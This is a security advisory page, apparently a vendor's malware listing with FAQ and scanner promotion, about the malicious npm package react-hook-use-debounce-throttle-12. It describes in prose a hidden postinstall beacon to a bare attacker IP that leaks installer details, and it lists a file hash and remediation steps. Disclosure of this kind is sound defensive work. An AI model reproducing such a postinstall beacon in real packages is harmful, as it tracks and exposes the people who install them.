Which versions of react-hook-use-debounce-throttle-12 are malicious?

The following npm versions of react-hook-use-debounce-throttle-12 are flagged malicious: 1.0.0. Treat any of these as compromised.

How do I remediate react-hook-use-debounce-throttle-12 if I installed it?

Remove react-hook-use-debounce-throttle-12 from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is react-hook-use-debounce-throttle-12 part of a known attack campaign?

Yes — react-hook-use-debounce-throttle-12 is associated with the IN-MAL-2026-006801 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect react-hook-use-debounce-throttle-12 in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking react-hook-use-debounce-throttle-12 and packages like it before any post-install script runs.

Malicious package

react-hook-use-debounce-throttle-12npm

Malicious code in react-hook-use-debounce-throttle-12 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5909

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall react-hook-use-debounce-throttle-12

What this malware does

package.json declares a postinstall script that issues an HTTPS-module HTTP GET to the bare IP 8.140.205.78:80 on every npm install. The request is wrapped in try/catch and an .on('error',...) handler that swallows failures, hiding the beacon from operator output. The package advertises itself as a React debounce/throttle hooks library — functionality that requires no install-time network I/O. The beacon discloses each installer's public IP address, install timestamp, and Node.js version (via the default User-Agent) to a host with no relationship to the stated purpose. The package also exhibits typosquat-shape naming (a -12 numeric suffix on a generic React hook utility name) with placeholder author metadata (dev-utils <[email protected]>, GitHub path that does not correspond to a known publisher), consistent with victim-enumeration / install-tracking infrastructure.

Malicious versions

1 flagged

1.0.0

Indicators of compromise (SHA-256)

f7491b25e457c908dae1b32fe800f461843e4463807c8590044e4b7cc769843a

Frequently asked questions

No. react-hook-use-debounce-throttle-12 on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006801

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection